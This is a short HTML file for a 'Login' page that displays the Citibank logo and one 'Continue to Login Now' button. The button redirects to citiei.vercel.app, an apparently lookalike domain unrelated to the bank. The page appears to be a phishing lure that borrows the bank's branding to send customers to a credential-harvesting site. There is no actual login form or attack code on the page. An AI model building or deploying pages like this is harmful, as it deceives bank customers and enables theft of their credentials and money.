<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Login</title>
    <style>
      * {
        margin: 0;
        padding: 0;
        box-sizing: border-box;
      }

      body {
        font-family: Arial, sans-serif;
        background-color: #f0f2f5;
        display: flex;
        justify-content: center;
        height: 100vh;
      }

      .login-wrapper {
        text-align: center;
        margin-top: 2rem;
      }

      .logo {
        width: 350px;
        margin: 8rem;
      }

      .login-container {
        background-color: white;
        padding: 30px;
        width: 400px;
        border-radius: 15px;
        box-shadow: 0px 0px 15px rgba(0, 0, 0, 0.1);
        text-align: center;
      }

      .login-btn {
        width: 100%;
        padding: 15px;
        background-color: #056dae;
        color: white;
        border: none;
        border-radius: 12px;
        font-size: 20px;
        font-weight: 700;
        cursor: pointer;
      }

      .login-btn:hover {
        background-color: #144eb1;
      }
    </style>
  </head>
  <body>
    <div class="login-wrapper">
      <img
        src="https://www.cdnlogo.com/logos/c/96/citibank.svg"
        alt="XYZ Logo"
        class="logo"
      />
      <button
        class="login-btn"
        onclick="window.location.href='https://citiei.vercel.app/';"
      >
        Continue to Login Now
      </button>
    </div>
  </body>
</html>
